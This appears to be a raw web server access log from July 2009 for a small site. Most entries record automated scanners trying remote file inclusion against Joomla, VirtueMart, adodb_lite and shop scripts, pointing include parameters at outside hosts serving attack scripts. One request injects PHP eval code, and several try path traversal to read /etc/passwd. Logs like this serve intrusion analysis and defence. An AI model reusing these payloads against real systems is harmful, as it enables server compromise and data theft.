77.221.130.13 - - [26/Jul/2009:10:09:05 -0700] "GET /logs/access_080506.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:09:06 -0700] "GET /logs/access_080506.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:09:08 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21159 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:09:08 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:09:09 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21159 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:09:15 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21159 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:09:15 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21159 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:09:20 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:09:21 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.147.127.216 - - [26/Jul/2009:10:09:24 -0700] "GET /bikes/occcb/ebayisapi.dll.htm HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]" "dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:09:50 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:09:51 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:10:22 -0700] "GET /logs/access_080207.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:10:22 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:10:22 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:10:27 -0700] "GET /logs/access_080506.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:10:10:38 -0700] "GET /logs/access_090424.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:10:10:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:10:10:39 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:10:40 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:10:40 -0700] "GET /logs/access_080207.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:10:40 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:10:44 -0700] "GET /logs/access_080506.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:10:48 -0700] "GET /logs/access_080207.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:10:48 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:10:48 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:10:55 -0700] "GET /logs/access_080506.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:10:55 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:10:56 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:10:56 -0700] "GET /logs/access_080207.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:11:00 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:11:01 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:11:02 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:11:09 -0700] "GET /logs/access_080506.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:11:18 -0700] "GET /logs/access_080506.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:11:24 -0700] "GET /logs/access_080207.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:11:24 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:11:24 -0700] "GET /logs/access_080506.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:11:25 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.110 - - [26/Jul/2009:10:11:57 -0700] "GET /logs/access_080322.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:10:12:03 -0700] "GET /logs/access_080314.log/////////?cmd&file=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:10:12:05 -0700] "GET ////////?cmd&file=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 200 21126 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:10:12:05 -0700] "GET /logs/////////?cmd&file=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 200 110067 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:10:12:36 -0700] "GET /logs/access_090121.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//harap/di.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:10:13:27 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:10:13:27 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:10:13:27 -0700] "GET /logs/access_090505.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:13:30 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:13:30 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:13:30 -0700] "GET /logs/access_080318.log%20%20/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:13:36 -0700] "GET /logs/access_080207.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:13:36 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:13:37 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:13:41 -0700] "GET /logs/access_080506.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:13:55 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:13:59 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:14:00 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:14:00 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:14:02 -0700] "GET /logs/access_080207.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:14:05 -0700] "GET /logs/access_080520.log%20%20/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
67.205.53.98 - - [26/Jul/2009:10:14:08 -0700] "GET /logs/access_090505.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.39.159 - - [26/Jul/2009:10:14:11 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.39.159 - - [26/Jul/2009:10:14:11 -0700] "GET /logs/access_081026.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.39.159 - - [26/Jul/2009:10:14:11 -0700] "GET /logs/access_081018.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.39.159 - - [26/Jul/2009:10:14:11 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:10:14:17 -0700] "GET /logs/access_080506.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:14:23 -0700] "GET /logs/access_080831.log%20%20///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:14:24 -0700] "GET /logs/access_080831.log%20%20///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:14:31 -0700] "GET /logs/access_090223.log%20%20///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:14:32 -0700] "GET /logs/access_090223.log%20%20///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:14:48 -0700] "GET /logs/access_071228.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:14:48 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:14:48 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:14:55 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:14:55 -0700] "GET /logs/access_071228.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:14:55 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:14:56 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:14:59 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:10:15:31 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:10:15:31 -0700] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:10:15:31 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:10:15:51 -0700] "GET /logs/access_080819.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [26/Jul/2009:10:16:03 -0700] "GET /logs/access_080526.log//components/com_sefservicemap/sefservicemap.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.14 - - [26/Jul/2009:10:16:04 -0700] "GET /components/com_sefservicemap/sefservicemap.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.14 - - [26/Jul/2009:10:16:04 -0700] "GET /logs//components/com_sefservicemap/sefservicemap.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:10:16:06 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//harap/di.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:10:16:37 -0700] "GET /logs/access_080919.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:10:16:50 -0700] "GET /logs/access_080819.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:16:52 -0700] "GET /logs/access_080318.log/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:17:16 -0700] "GET /logs/access_080520.log/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:17:33 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:17:33 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
218.237.66.229 - - [26/Jul/2009:10:17:35 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:17:36 -0700] "GET /logs/access_071228.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:17:36 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:17:36 -0700] "GET /logs/access_071228.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:17:36 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:17:37 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:17:40 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:17:44 -0700] "GET /logs/access_090119.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:10:17:50 -0700] "GET /logs/access_080822.log//expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:10:17:50 -0700] "GET /expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:10:17:51 -0700] "GET /logs//expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.188.117.15 - - [26/Jul/2009:10:17:56 -0700] "HEAD /bikes/003.JPG HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
205.188.117.74 - - [26/Jul/2009:10:17:56 -0700] "HEAD /bikes/004.JPG HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
205.188.117.14 - - [26/Jul/2009:10:17:56 -0700] "HEAD /bikes/002.JPG HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
205.188.117.14 - - [26/Jul/2009:10:17:57 -0700] "GET /bikes/002.JPG HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
205.188.117.15 - - [26/Jul/2009:10:17:58 -0700] "GET /bikes/003.JPG HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
205.188.117.74 - - [26/Jul/2009:10:17:58 -0700] "GET /bikes/004.JPG HTTP/1.1" 200 1114112 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
91.191.35.118 - - [26/Jul/2009:10:18:45 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:10:18:47 -0700] "GET /logs/access_080724.log//expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
